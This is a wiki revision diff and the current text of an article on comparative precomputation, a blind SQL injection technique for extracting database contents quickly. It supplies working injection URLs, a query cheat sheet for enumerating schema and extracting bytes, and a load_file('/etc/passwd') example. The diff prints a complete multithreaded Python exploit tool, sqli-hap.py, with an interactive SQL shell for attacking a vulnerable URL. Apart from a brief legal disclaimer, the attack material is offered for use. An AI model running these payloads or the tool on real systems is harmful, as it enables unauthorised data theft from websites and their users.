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Difference between revisions of "SQL injection/Blind/Extraction/Precomputation"

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'''Comparative precomputation''' attacks are a form of ''blind [[SQL injection]]'' [[exploitation]], a two-part process in which the attacker crawls a particular sequence of data normally retrieved by the vulnerable [[input]] and uses the output to precompute a table for future comparison.  Once the table has been precomputed, it is possible to "lookup" [[hexadecimal]], [[binary]], and ascii values within it.  In some cases it is possible to ''retrieve multiple [[byte]]s'' per request from a remote [[database]] with blind injection by utilizing this technique.
+
'''Comparative precomputation''' attacks are a form of ''[[blind SQL injection]]'' [[exploitation]], a two-part process in which the attacker crawls a particular sequence of data normally retrieved by the [[vulnerability|vulnerable]] [[input]] and uses the output to precompute a table for future comparison.  Once the table has been precomputed, it is possible to "lookup" [[hexadecimal]], [[binary]], and [[ascii]] values within it.  In some cases it is possible to ''[[#Getting past the byte|retrieve multiple bytes]]'' per request from a remote [[database]] with blind injection by utilizing this technique.
  
{{info|This technique is much more efficient for blind data retrieval than [[boolean enumeration]], which requires as many as 8 [[HTTP]] requests to obtain the value of a single [[byte]].  This is the fastest (and quietest) known blind SQL injection technique.}}
+
{{info|This technique is much more efficient for blind data retrieval than [[boolean enumeration]], which requires as many as 8 [[HTTP]] requests to obtain the value of a single [[byte]].  ''Comparative precomputation'' is the ''quietest and fastest'' known blind [[SQL injection]] technique.}}
 +
 
 +
{{social}}
 +
 
 +
{{prereq|[[SQL injection]] and [[SQL orientation|manipulation of sql data]]}}
  
 
==The comparative precomputation attack==
 
==The comparative precomputation attack==
Line 12: Line 16:
 
}}  
 
}}  
  
Precomputation is done for performance and efficiency purposes.  At the very least, a comparative test will be required - without precomputation, it is expected that ram usage may skyrocket.  The more complex a remote site is (random content generation, etc), the more difficult this type of attack becomes to automate.
+
Precomputation using '''md5''' [[cryptography#hashes|hashing]] is done in the [[#Proof_of_Concept:_sqli-hap.py|proof of concept]] for performance and efficiency purposes.  At the very least, a comparative test will be required - without hashing, it is expected that ram usage may skyrocket.  The more complex a remote site is (random content generation, etc), the more difficult this type of [[sql injection]] [[exploitation|attack]] becomes to automate.
  
 
== Theory ==
 
== Theory ==
The example in this section will rarely (if ever) work in the wild.  It is a more basic explaination to prepare the reader's comprehension of the more advanced explanation later.  (skip to advanced explanation)
+
'''[[Exploitation]] is a two part process:'''
 +
:# Precomputing the comparison data
 +
:# Data extraction
 +
 
 +
 
 +
The example in this section (''Theory'') is a more basic explaination to prepare the reader's comprehension of the [[#Surpassing_obstacles|more advanced explanation]] later and as such will be unlikely to exploit successfully.
  
Exploitation is a two part process.  The first part includes building the precomputed comparison table - the second part involves extracting data.
 
  
 
=== Building lookup tables ===
 
=== Building lookup tables ===
Line 30: Line 38:
  
 
=== Extracting a cell ===
 
=== Extracting a cell ===
* To determine the ascii code of the first character of the sql version, an attacker might visit:
+
* To determine the ascii code of the first character of the [[sql]] version, an attacker might visit:
 
   /articles.php?id=ascii(substring(version() from 1 for 1))
 
   /articles.php?id=ascii(substring(version() from 1 for 1))
  
The attacker would then take a checksum of the returned html data, and lookup its corresponding numeric id value saved during lookup table creation.  This numeric id's value now corresponds with the ascii value of the first byte of the version.  Following until the end of the cell, one could simply move to the next character:
+
The attacker would then take a [[cryptography|checksum]] of the returned html data, and lookup the value of its corresponding numeric id which was saved during lookup table creation.  This numeric id's value now corresponds with the ascii value of the first [[byte]] of the version.  Following until the end of the cell, one could simply move to the next character:
 
   /articles.php?id=ascii(substring(version() from 2 for 1))
 
   /articles.php?id=ascii(substring(version() from 2 for 1))
  
 
=== Extracting the length of a cell ===
 
=== Extracting the length of a cell ===
Suppose the goal in this situation is to obtain the length of the string returned by [[SQL|SQL's]] native '''version()''' function.  In some situations the [[database]] will treat the result of length() as a string or integer interchangably, however in some cases, casting may be required.   
+
Suppose the goal in this situation is to obtain the length of the string returned by [[SQL|SQL's]] native '''version()''' function.  In some situations the [[database]] will treat the result of length() as a string or integer interchangably, however in some cases, [[programming#casting|casting]] may be required.   
  
 
The simple method for length determination of the version, or any cell is to treat the length as a string; for example an attacker may visit:
 
The simple method for length determination of the version, or any cell is to treat the length as a string; for example an attacker may visit:
 
   /articles.php?id=length((select length(version())))
 
   /articles.php?id=length((select length(version())))
  
This is because it is highly unlikely that the result of the version query will be longer than (9 * 10 ^ 255).  Once the length of the length is determined by treating the length's length as a single byte and looking it up in the table, an attacker could grab single bytes of the length by their ascii codes:
+
This is because it is highly unlikely that the result of the version query will be longer than (9 * 10 ^ 255).  Once the length of the length is determined by treating the length's length as a single [[byte]] and looking it up in the table, an attacker could grab single bytes of the length by their [[ascii]] codes:
 
   /articles.php?id=ascii(substring(length(version()),1,1))
 
   /articles.php?id=ascii(substring(length(version()),1,1))
  
Line 48: Line 56:
  
 
== Surpassing obstacles ==
 
== Surpassing obstacles ==
With the above example, exploitation in the wild is extremely unlikely, due to the fact that the id's in the articles table may not in fact be sequential - there may not even be 255 of them!  Or what if the index column for the where clause is a string?  What if there are duplicates in the retrieved data?
+
With the [[#Building lookup tables|above example]], [[exploitation]] in the wild is extremely unlikely, due to the fact that the id's in the articles table may not in fact be sequential - there may not even be 255 of them!  Or what if the index column for the [[SQL orientation#Where|where clause]] is a string?  What if there are duplicates in the retrieved data?
  
 
=== Non-sequential identifiers ===
 
=== Non-sequential identifiers ===
Different SQL services provide different interfaces for solving this problem.  This is where it becomes important to know the specific column name and table name for the injectable query.   
+
Different [[database engine|SQL services]] provide different interfaces for solving this problem.  This is where it becomes important to know the specific column name and table name for the injectable query.   
  
 
Starting with the original example query:
 
Starting with the original example query:
Line 63: Line 71:
  
 
==== Lookup Table ====
 
==== Lookup Table ====
An attacker would visit the following url's during byte discovery (only 3 are shown):
+
An attacker would visit the following url's during the lookup table's [[byte]] discovery (only 3 are shown):
 
   /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos='''1''')
 
   /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos='''1''')
 
   /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos='''2''')
 
   /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos='''2''')
 
   ...
 
   ...
 
   /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos='''255''')
 
   /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos='''255''')
 
  
 
==== Data extraction ====
 
==== Data extraction ====
 
Iterating until the length of the version, an attacker would use the following url's to extract bytes from the string:
 
Iterating until the length of the version, an attacker would use the following url's to extract bytes from the string:
  /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from '''1''' for 1)))
+
# /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from '''1''' for 1)))
  /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from '''2''' for 1)))
+
# /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from '''2''' for 1)))
 
+
  
 
=== String column index ===
 
=== String column index ===
Line 90: Line 96:
  
 
=== Duplicate http responses ===
 
=== Duplicate http responses ===
The best solution for this is to modify the middle select query containing the join to add a group by clause.  If the return data is grouped by the resulting display column containing duplicate data before the row counter is applied, it will force the return data to be unique so that 255 ''unique'' checksums may be collected.
+
The best way to avoid duplicate http responses is to modify the middle [[SQL_orientation#SELECT_-_Select_data_from_a_table|select query]] containing the join to add a [[SQL_orientation#Group_by|group by clause]].  If the return data is grouped by the resulting display column containing duplicate data before the row counter is applied, it will force the return data to be unique so that 255 ''unique'' [[cryptography#hashes|checksums]] may be collected.
  
 
=== Query cheat sheet ===  
 
=== Query cheat sheet ===  
Line 111: Line 117:
 
* A hashtable must be built using resultset rows 0-255 to retrieve the value of a byte in a single request.
 
* A hashtable must be built using resultset rows 0-255 to retrieve the value of a byte in a single request.
 
* This number of rows is 256 (0-255 starting from 0 is 256 values) because 2^8=256 and 8 bits are in a byte.
 
* This number of rows is 256 (0-255 starting from 0 is 256 values) because 2^8=256 and 8 bits are in a byte.
 +
Fortunately for [[hackers|exploit developers]], most [[SQL]] services provide multiple ways of converting string or other data to its [[binary]] format. 
  
=== [[Binary]] optimization ===
 
Fortunately for [[hackers|exploit developers]], most [[SQL]] services provide multiple ways of converting data to its [[binary]] format. 
 
  
 +
=== [[Binary]] optimization ===
 
This means that if there are even as few as 3 rows in the table, combined with a null identifier row (most likely a blank response; the same response would be obtained with a nonexistent index being placed into the where clause) there are 4 obtainable values - the same number of values provided by two bits (1/4 of 1 byte).  This would allow for the retrieval of 1/4 of 1 [[byte]] per request - still faster than [[boolean enumeration|boolean enumeration's]] single bit per request.
 
This means that if there are even as few as 3 rows in the table, combined with a null identifier row (most likely a blank response; the same response would be obtained with a nonexistent index being placed into the where clause) there are 4 obtainable values - the same number of values provided by two bits (1/4 of 1 byte).  This would allow for the retrieval of 1/4 of 1 [[byte]] per request - still faster than [[boolean enumeration|boolean enumeration's]] single bit per request.
  
However, on the flipside of this, it also means that if there are 65,355 rows in the affected result set, it is possible to extract ''two [[byte]]s'', a full word - per request.  Due to lookup table construction, this is only a performance optimization over extracting a single byte under the circumstance that the attacker intends to retreive more than 65 kilobytes of data from the remote [[database]], but an optimization nonetheless.
+
In other cases, it also means that if there are 65,355 rows in the affected result set, it is possible to extract ''two [[byte]]s'', a full word - per request.  Due to lookup table construction, this is only a performance optimization over extracting a single byte under the circumstance that the attacker intends to retreive more than 65 kilobytes of data from the remote [[database]] (an optimization nonetheless).
 +
 
  
 
==== Sizing the hashtable ====
 
==== Sizing the hashtable ====
Line 131: Line 138:
  
 
  n        = log(context_result_count) / log(2)
 
  n        = log(context_result_count) / log(2)
  max_bits = n - (n modulus 1)
+
  max_bits = n - (n % 1)
  
 
==== Response extraction ====
 
==== Response extraction ====
 
:''See Also: [[bitwise math]]''
 
:''See Also: [[bitwise math]]''
  
To get at [[binary]] data, things will need to be done a little differently.  In the below example, the [[hexadecimal]] value of the concatenated first two [[byte]]s in the version() string is casted to an integer for extraction:
+
To get at [[binary]] data, the [[hexadecimal]] value of the concatenated first two [[byte]]s in the version() string is casted to an integer for extraction:
  
 
{{code|text=<source lang="sql">
 
{{code|text=<source lang="sql">
Line 171: Line 178:
  
 
=== Compression ===
 
=== Compression ===
The final option here is compression.  It is possible to utilize server-side compression before extracting the binary data from the database, then decompress it locally:
+
It is possible to utilize server-side compression before extracting the [[binary]] data from the [[database]], then decompress it locally:
  
 
{{code|text=<source lang="sql">  mysql> select uncompress(compress(version()));
 
{{code|text=<source lang="sql">  mysql> select uncompress(compress(version()));
Line 217: Line 224:
 
   1 row in set (0.00 sec)</source>}}
 
   1 row in set (0.00 sec)</source>}}
  
== Proof of Concept: sqli-hap.py ==
+
== Proof of concept ==
{{info|A more featureful tool for this is in development at this time, though it is unclear if it will ever be available for public release.  More information as it becomes available.}}
+
{{main|mysqli-blindutils}}
  
This [[Python]] proof of concept does not automatically determine the context of the [[vulnerability]] or extract multiple [[byte]]s in a single request at this time.  It is tuned to extract a single [[byte]] of compressed data per request and requires 255 rows in the injectable [[SQL]] query.   
+
{{warning|<center>End user is responsible for his or her own actions when using this software.  It is a crime to use this software against any system that you do not own without written consent.</center>}}
 +
=== Video ===
 +
  http://ascii.io/a/1588
  
 +
=== Download ===
  
{{crime}}
+
* [[sqli-hap.py]] : [[sqli-hap.py source|source]] - [[download sqli-happy|direct download]] - [[download mysqli-blindutils]]
  
{{code|text=<source lang="python">#!/usr/bin/python2
+
== Related ==
import sys
+
import urllib2
+
import time
+
from binascii import hexlify
+
import _mysql
+
import md5
+
import pickle
+
import re
+
import os
+
import threading
+
import Queue
+
import readline
+
readline.parse_and_bind('tab: complete')
+
readline.parse_and_bind('set editing-mode vi')
+
  
BOLD = '\033[1m'
+
=== Tools & Articles ===
BLUE = '\033[34m'
+
* [[Talk:Comparative_precomputation|A walkthrough - questions can be asked here!]]
GREEN = '\033[32m'
+
* [[Timing based extraction]]
YELLOW = '\033[33m'
+
* [[Blind SQL injection]]
RED = '\033[91m'
+
* [[SQL injection]]
ENDC = '\033[0m'
+
* [[mysqli-blindutils]]
 +
* [[SQL backdoor]]s
  
def request(request_url):
+
=== Further reading ===
  req = urllib2.Request(request_url)
+
* [[SQL orientation]]
  req.add_header = ('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17')
+
* [[MySQL]]
  r = urllib2.urlopen(req)
+
* [[MySQL Troubleshooting]]
  return r.read()
+
  
def construct_discovery_query(url, column, table, counter):
+
<includeonly>
  discovery = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=%s)"
+
{{exploitation}}
  discovery =  discovery % (column, column, table, counter)
+
  return url + urllib2.quote(discovery)
+
  
def construct_injection_query(url, column, table, query, position):
+
[[Category:Web exploitation]]
  injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=ascii(substring(compress((%s)) from %s for 1)))"
+
  injection = injection % (column, column, table, query, position)
+
  return url + urllib2.quote(injection)
+
  
def get_length(url, column, table, query, ascii_table, counter):
 
  injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=(length(length(compress((%s))))))" % (column, column, table, query)
 
  length_length = url + urllib2.quote(injection)
 
  length_length = ascii_table[md5.new(request(length_length)).digest()]
 
  counter += 1
 
  
  length = ""
+
</includeonly>
  for i in range(1,length_length+1):
+
    injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=ascii(substring(length(compress((%s))) from %s for 1)))"
+
    injection = injection % (column, column, table, query, i)
+
    request_url = url + urllib2.quote(injection)
+
    length += chr(ascii_table[md5.new(request(request_url)).digest()])
+
    counter += 1
+
 
+
  return (int(length), counter)
+
 
+
def get_query(prompt):
+
  while 1:
+
    query = raw_input(prompt)
+
    if query != "":
+
      break
+
  return query
+
 
+
def do_query(url, column, table, query, ascii_table, i, q):
+
  tmp = construct_injection_query(url, column, table, query, i)
+
  q.put(chr(ascii_table[md5.new(request(tmp)).digest()]))
+
 
+
def do_table(url, column, table, i, q):
+
  tmp = construct_discovery_query(url, column, table, i)
+
  q.put(md5.new(request(tmp)).digest())
+
 
+
def print_percent(percent, start_time):
+
  elapsed_time = time.time() - start_time
+
  eta = ((elapsed_time) / percent) * 100 - elapsed_time
+
  sys.stdout.write("\r%s[*]%s Percent complete: %s%.2f%%%s -- Time elapsed: %s%.2f%s seconds -- Estimated time left: %s%.2f%s" % (GREEN, ENDC, YELLOW, percent, ENDC, YELLOW, elapsed_time, ENDC, YELLOW, eta, ENDC))
+
  sys.stdout.flush()
+
 
+
def do_thread(target, args, counter, length, type_query):
+
  if type_query == 0:
+
    ascii_table = {}
+
  else:
+
    query_result = ""
+
 
+
  if type_query == 0:
+
    i = 0
+
  else:
+
    i = 1
+
 
+
 
+
  sys.stdout.write("\r%s[*]%s Percent complete: %.2f%%" % (GREEN, ENDC, 0.0))
+
  sys.stdout.flush()
+
  start_time = time.time()
+
 
+
  while i < length:
+
    threads = {}
+
    queues  = []
+
 
+
    for j in range(0,11):
+
      if i < length:
+
        queues.append(Queue.Queue())
+
        threads[i] = threading.Thread(target=target, args=args + (i, queues[j]))
+
        i += 1
+
        counter += 1
+
        print_percent(100 * float(i) / float(length), start_time)
+
       
+
    for thread in threads:
+
      threads[thread].start()
+
 
+
    for j, thread in enumerate(sorted(threads.iterkeys())):
+
      if type_query == 0:
+
        ascii_table[queues[j].get()] = thread
+
      else:
+
        query_result += queues[j].get()
+
      threads[thread].join()
+
 
+
  sys.stdout.write('\n')
+
  sys.stdout.flush()
+
 
+
  if type_query == 0:
+
    return ascii_table
+
  else:
+
    return (counter, query_result)
+
 
+
def main(url, column, table):
+
  session_name = re.split("(https?://)?(.*)/", url)[2]
+
 
+
  print "%s[*]%s Checking for existing session" % (GREEN, ENDC)
+
  try:
+
    try:
+
      os.stat("data")
+
    except:
+
      os.mkdir("data")
+
    ascii_table = pickle.load(open("data/%s" % session_name, "rb" ))
+
    print "%s[*]%s Loaded precomputation table." % (GREEN, ENDC)
+
  except:
+
    print "%s[*]%s Building precomputation table.." % (GREEN, ENDC)
+
    current = time.time()
+
    ascii_table = do_thread(do_table, (url, column, table, ), 0, 256, 0)
+
    pickle.dump(ascii_table, open("data/%s" % session_name, "wb"))
+
    print "\n%s[*]%s Precomputation table built in %s%f%s seconds." % (GREEN, ENDC, YELLOW, time.time() - current, ENDC)
+
 
+
  print "%s[*]%s Enter a sql query:" % (GREEN, ENDC)
+
 
+
  while 1:
+
    query = get_query("%ssql shell>%s " % (BOLD, ENDC))
+
    if query == "exit":
+
      break
+
 
+
    query_result = ""
+
    counter = 0
+
    current = time.time()
+
    (length, counter) = get_length(url, column, table, query, ascii_table, counter)
+
 
+
    (counter, query_result) = do_thread(do_query, (url, column, table, query, ascii_table, ), counter, length+1, 1)
+
 
+
    query = "SELECT UNCOMPRESS(0x%s)" % hexlify(query_result)
+
    mysql_connection = _mysql.connect('localhost', 'root', 'new-password')
+
    mysql_connection.query(query)
+
    result = mysql_connection.use_result()
+
    data = result.fetch_row()[0][0]
+
    mysql_connection.close()
+
 
+
    print data
+
    print "\nRequests: %s%d%s (%s%f%s seconds)\nLength of retrieved data: %s%s%d%s%s" % (YELLOW, counter, ENDC, YELLOW, time.time() - current, ENDC, BOLD, YELLOW, len(data), ENDC, ENDC)
+
 
+
  print "%s[*]%s Good bye" % (GREEN, ENDC)
+
 
+
if __name__=="__main__":
+
  if len(sys.argv) != 4:
+
    print "Usage: %s <vulnerable url> <column name> <table name>" % sys.argv[0]
+
    exit()
+
 
+
  print "%s[*]%s Attacking: %s%s%s%s%s" % (GREEN, ENDC, BOLD, RED, sys.argv[1], ENDC, ENDC)
+
  main(sys.argv[1], sys.argv[2], sys.argv[3])
+
</source>}}
+

Latest revision as of 19:06, 5 May 2013

Comparative precomputation attacks are a form of blind SQL injection exploitation, a two-part process in which the attacker crawls a particular sequence of data normally retrieved by the vulnerable input and uses the output to precompute a table for future comparison. Once the table has been precomputed, it is possible to "lookup" hexadecimal, binary, and ascii values within it. In some cases it is possible to retrieve multiple bytes per request from a remote database with blind injection by utilizing this technique.

c3el4.png This technique is much more efficient for blind data retrieval than boolean enumeration, which requires as many as 8 HTTP requests to obtain the value of a single byte. Comparative precomputation is the quietest and fastest known blind SQL injection technique.
SQL injection/Blind/Extraction/Precomputation requires a basic understanding of SQL injection and manipulation of sql data


The comparative precomputation attack

c3el4.png This attack heavily relies on the remote dataset for successful exploitation and thus its rate of data retrieval is more variable than other methods.

Requirements:

  • Before comparative precomputation can be initiated, an attacker or penetration tester must be aware of the vulnerable query's context (column and table names).
  • In order for it to be effectively faster than boolean enumeration, the contents of the query result context (column and table) must contain 3 or more instances of unique column and row data

Precomputation using md5 hashing is done in the proof of concept for performance and efficiency purposes. At the very least, a comparative test will be required - without hashing, it is expected that ram usage may skyrocket. The more complex a remote site is (random content generation, etc), the more difficult this type of sql injection attack becomes to automate.

Theory

Exploitation is a two part process:

  1. Precomputing the comparison data
  2. Data extraction


The example in this section (Theory) is a more basic explaination to prepare the reader's comprehension of the more advanced explanation later and as such will be unlikely to exploit successfully.


Building lookup tables

  • Take the following query
  $query = "select * from articles where id=" . $_GET['id']; 
  • Being executed at the following uri:
 /articles.php?id=1
  • Assume, for one moment, that there are 255 rows with sequential id's starting at 1 in the articles table. It will rarely ever be this way in the wild.
  • First, the attacker would crawl all of the pages at id's 1-255, saving them in a hashtable with the associated id used to generate the response.

Extracting a cell

  • To determine the ascii code of the first character of the sql version, an attacker might visit:
 /articles.php?id=ascii(substring(version() from 1 for 1))

The attacker would then take a checksum of the returned html data, and lookup the value of its corresponding numeric id which was saved during lookup table creation. This numeric id's value now corresponds with the ascii value of the first byte of the version. Following until the end of the cell, one could simply move to the next character:

 /articles.php?id=ascii(substring(version() from 2 for 1))

Extracting the length of a cell

Suppose the goal in this situation is to obtain the length of the string returned by SQL's native version() function. In some situations the database will treat the result of length() as a string or integer interchangably, however in some cases, casting may be required.

The simple method for length determination of the version, or any cell is to treat the length as a string; for example an attacker may visit:

 /articles.php?id=length((select length(version())))

This is because it is highly unlikely that the result of the version query will be longer than (9 * 10 ^ 255). Once the length of the length is determined by treating the length's length as a single byte and looking it up in the table, an attacker could grab single bytes of the length by their ascii codes:

 /articles.php?id=ascii(substring(length(version()),1,1))

An attacker would then treat the length as a single cell being extracted until its value is determined.

Surpassing obstacles

With the above example, exploitation in the wild is extremely unlikely, due to the fact that the id's in the articles table may not in fact be sequential - there may not even be 255 of them! Or what if the index column for the where clause is a string? What if there are duplicates in the retrieved data?

Non-sequential identifiers

Different SQL services provide different interfaces for solving this problem. This is where it becomes important to know the specific column name and table name for the injectable query.

Starting with the original example query:

  $query = "select * from articles where id=" . $_GET['id']; 

The important bits are:

  • Current column name: id
  • Current table name: articles

Assuming that all of the articles are unique and that the id's are non-sequential, it is possible to retrieve 255 ordered results anyway.

Lookup Table

An attacker would visit the following url's during the lookup table's byte discovery (only 3 are shown):

 /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=1)
 /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=2)
 ...
 /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=255)

Data extraction

Iterating until the length of the version, an attacker would use the following url's to extract bytes from the string:

  1. /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from 1 for 1)))
  2. /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from 2 for 1)))

String column index

Using the following example query:

  $query = "select * from articles where title='" . $_GET['title'] . "'"; 

And the following uri:

 /articles.php?title=vulnerable_site

An attacker is able to change title to the following:

 vulnerable_site' and 1=5 or title=([mapping or extraction query]) #' 
c3el4.png When performing web-based attacks, the "#" character must be URL encoded to %23 in the client browser to prevent the HTTP protocol from treating it as an HTML anchor.


Duplicate http responses

The best way to avoid duplicate http responses is to modify the middle select query containing the join to add a group by clause. If the return data is grouped by the resulting display column containing duplicate data before the row counter is applied, it will force the return data to be unique so that 255 unique checksums may be collected.

Query cheat sheet

Byte discovery table generation query (iterating over each row for 0..255) :

  (SELECT [COLUMN] FROM
    (SELECT [COLUMN],@r:=@r+1 AS pos FROM [TABLE] c JOIN (SELECT @r:=0) r LIMIT 255) x
  WHERE pos=$counter)

Data extraction (iterating over each byte to get its value for 1..length(cell)):

  (SELECT [COLUMN] FROM
    (SELECT [COLUMN],@r:=@r+1 AS pos FROM [TABLE] c JOIN (SELECT @r:=0) r LIMIT 255) x
    WHERE pos=ascii(SUBSTRING(
        (SELECT group_concat(TABLE_NAME,0x2e,column_name) FROM information_schema.columns WHERE table_schema=DATABASE())
    FROM $counter FOR 1))
  );

Getting past the byte

So far it is proven that a single byte of data can be extracted. In review:

  • A hashtable must be built using resultset rows 0-255 to retrieve the value of a byte in a single request.
  • This number of rows is 256 (0-255 starting from 0 is 256 values) because 2^8=256 and 8 bits are in a byte.

Fortunately for exploit developers, most SQL services provide multiple ways of converting string or other data to its binary format.


Binary optimization

This means that if there are even as few as 3 rows in the table, combined with a null identifier row (most likely a blank response; the same response would be obtained with a nonexistent index being placed into the where clause) there are 4 obtainable values - the same number of values provided by two bits (1/4 of 1 byte). This would allow for the retrieval of 1/4 of 1 byte per request - still faster than boolean enumeration's single bit per request.

In other cases, it also means that if there are 65,355 rows in the affected result set, it is possible to extract two bytes, a full word - per request. Due to lookup table construction, this is only a performance optimization over extracting a single byte under the circumstance that the attacker intends to retreive more than 65 kilobytes of data from the remote database (an optimization nonetheless).


Sizing the hashtable

The largest possible value to retrieve in a single request is equal to the result of the following query:

 SELECT COUNT(context_column) FROM context_table

So in the `articles' example, the result of:

 SELECT COUNT(id)+1 FROM articles

This is the maximum bitwise or binary value we can obtain in a single request (called context_result_count).

  • The following equation can be used to determine the maximum bits available to extract in a single request (max_bits):
n        = log(context_result_count) / log(2)
max_bits = n - (n % 1)

Response extraction

See Also: bitwise math

To get at binary data, the hexadecimal value of the concatenated first two bytes in the version() string is casted to an integer for extraction:

 
 mysql> SELECT conv(hex(substr(version() FROM 1 FOR 2)),16,10);
 +-------------------------------------------------+
 | conv(hex(substr(version() FROM 1 FOR 2)),16,10) |
 +-------------------------------------------------+ 
 | 13614                                           |
 +-------------------------------------------------+
 1 ROW IN SET (0.00 sec)
 

Suppose there was only enough room for 10 bits. When selecting 2 bytes, 16 bits are retrieved. To shift the value of the first sixteen bits by 6 bits to the right (grabbing only the first 10 bits):

 mysql> SELECT conv(hex(substr(version() FROM 1 FOR 2)),16,10) >> 0x6;
 +--------------------------------------------------------+
 | conv(hex(substr(version() FROM 1 FOR 2)),16,10) >> 0x6 |
 +--------------------------------------------------------+
 |                                                    212 |
 +--------------------------------------------------------+
 1 ROW IN SET (0.01 sec)

To get the next ten bits, (bits 11 through 20), we start at the third bit (shift left 0x2) in the second byte of the string, continuing until halfway through the third byte (shift right 0x4, shift right 0x2 to fix shift left):

  mysql> SELECT conv(hex(substr(version() FROM 2 FOR 2)),16,10) << 0x2 >> 0x6;
 +---------------------------------------------------------------+
 | conv(hex(substr(version() FROM 2 FOR 2)),16,10) << 0x2 >> 0x6 |
 +---------------------------------------------------------------+
 |                                                           739 |
 +---------------------------------------------------------------+
 1 ROW IN SET (0.00 sec)

And so on and so forth.

Compression

It is possible to utilize server-side compression before extracting the binary data from the database, then decompress it locally:

  mysql> SELECT uncompress(compress(version()));
  +---------------------------------+
  | uncompress(compress(version())) |
  +---------------------------------+
  | 5.1.61-0+squeeze1               |
  +---------------------------------+
  1 ROW IN SET (0.00 sec)

On smaller pieces of data, this can actually lose out on performance:

  mysql> SELECT LENGTH(compress(version()));
  +-----------------------------+
  | LENGTH(compress(version())) |
  +-----------------------------+
  |                          29 |
  +-----------------------------+
  1 ROW IN SET (0.00 sec)
 
  mysql> SELECT LENGTH(version());
  +-------------------+
  | LENGTH(version()) |
  +-------------------+
  |                17 |
  +-------------------+
  1 ROW IN SET (0.00 sec)

However on larger pieces of data, the compression can significantly increase efficiency:

  mysql> SELECT LENGTH(load_file('/etc/passwd'));
  +----------------------------------+
  | LENGTH(load_file('/etc/passwd')) |
  +----------------------------------+
  |                             1225 |
  +----------------------------------+
  1 ROW IN SET (0.00 sec)
 
  mysql> SELECT LENGTH(compress(load_file('/etc/passwd')));
  +--------------------------------------------+
  | LENGTH(compress(load_file('/etc/passwd'))) |
  +--------------------------------------------+
  |                                        535 |
  +--------------------------------------------+
  1 ROW IN SET (0.00 sec)

Proof of concept

Main article: mysqli-blindutils
RPU0j.png
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